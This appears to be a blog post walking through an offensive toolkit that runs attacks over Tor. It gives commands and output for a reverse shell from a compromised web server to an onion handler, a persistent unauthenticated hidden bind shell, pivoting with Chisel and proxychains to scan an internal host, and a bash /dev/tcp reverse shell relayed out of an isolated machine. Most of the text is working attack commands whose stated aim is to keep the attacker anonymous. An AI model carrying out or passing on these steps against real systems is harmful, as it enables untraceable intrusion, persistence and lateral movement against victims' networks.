Offensive Tor Toolkit PoC

In this post we will be showing how to use Offensive Tor Toolkit for pentesting over Tor. This suite of tools will allow us to execute exploitation and post-exploitation tasks from the victim preserving the attacker anonymity. For more info, check the docs.

First of all, we have the following vulnerable scenario:

  • Victim1 serves a vulnerable service to Internet.
  • Victim2 serves a vulnerable service to the internal network and it has no access to Internet.


Gaining access with reverse-shell-over-tor

We assume that we are able to execute commands in Victim1 in some way. Then, to obtain a reverse shell preserving anonymity, we will use reverse-shell-over-tor from Offensive Tor Toolkit as follows:

  • Attacker: run the handler reachable from a Hidden Service.
[attacker]$ grep '^HiddenService' /etc/tor/torrc
HiddenServiceDir /tmp/tortest
HiddenServicePort 4444

[attacker]$ cat /tmp/tortest/hostname

[attacker]$ nc -lvnp 4444
[victim1]$ ./reverse-shell-over-tor \
    -listener m5et..jyd.onion:4444
  • Attacker: reverse shell is catched with the handler.
[attacker]$ nc -lvnp 1234
uid=48(apache) gid=48(apache) groups=48(apache)

Reverse Shell over Tor

Multi-shell access with bind shell

In order to get a bind shell served by Victim1, we will use hidden-bind-shell as follows:

[victim1]$ ./hidden-bind-shell \
    -data-dir /tmp/datadir/ \
    -hiddensrvport 1234
Bind shell is listening on hgnzi6j3rqog6yew.onion:1234
  • Attacker: connect to the Hidden Service to get a shell session.
[attacker]$ alias nctor='nc --proxy --proxy-type socks5'
[attacker]$ nctor -v hgnzi6j3rqog6yew.onion 1234
uid=48(apache) gid=48(apache) groups=48(apache)

It should be noted that data-dir flag will allow us to start the service always in the same onion address.

Currently, this bind shell has no authentication. This means that this bind shell for persistent purposes can be dangerous.

Hidden Bind Shell

Pivoting with hidden-portforwarding and Chisel

At this point, Victim1 is already compromised. In order to reach Victim2 (the isolated network machine), we will use Victim1. To achieve our goal, we will use hidden-portforwarding together with Chisel.

With this approach, we will set up a Hidden Service in Victim1 that redirects to the Chisel server. Thus, from the attacker we can generate a tunnel with the Chisel client on which to send traffic.

Chisel client allows the attacker to generate a tunnel to the Chisel server.

[victim1]$ ./chisel server -p 1111 --socks5 &
[victim1]$ ./hidden-portforwarding \
    -data-dir /tmp/pf-datadir \
    -forward \
    -hidden-port 9001
Forwarding xa7ljkruk7lra4el.onion:9001 ->
  • Attacker: Connect Chisel client to the Chisel server through the Hidden Service.
[attacker]$ alias chisel-client-tor='chisel client --proxy socks://'
[attacker]$ chisel-client-tor xa7ljkruk7lra4el.onion:9001 socks &
[attacker]$ ss -lntp | grep chisel
LISTEN 0   4096*  users:(("chisel",pid=3730,fd=3))

Now, Chisel client is listening as a SOCKS5 proxy so that traffic sent through the proxy goes out through Victim1. All you need to reach Victim2 is to connect to this proxy as follows:

[attacker]$ alias pc4='proxychains4 -f /etc/proxychains4.conf'
[attacker]$ cat /etc/proxychains4.conf
socks5 1080

[attacker]$ pc4 nmap -sT -Pn -n -sV -sC -p80,22,25,3000 victim2
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd 2.4.43 (() PHP/5.4.16)
3000/tcp open  http    Mongoose httpd

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 230.37 seconds

Hidden Portforwarding

Remote port forwarding through Tor

Victim2 does not have Internet access, so we cannot access Tor directly from it. Alternatively, we can use tcp2tor-proxy to have Victim1 used as a Tor proxy for Victim2.

  • Victim1: Set up the remote port forwarding so that will reach the Hidden Service.
[victim1]$ ./tcp2tor-proxy -listen -onion-forward m5et..jyd.onion:4444
Proxying -> m5et..jyd.onion:4444
  • Attacker: Set up a handler to received reverse shells.
[attacker]$ nc -lnvp 1234
  • Victim2: Send the reverse shell to Victim1 (tcp2tor-proxy).
[victim2]$ bash -i >& /dev/tcp/victim1/60101 0>&1
  • Attacker: Receive the reverse shell
[attacker]$ nc -lnvp 1234
uid=48(apache) gid=48(apache) groups=48(apache)

Tcp2Tor Proxy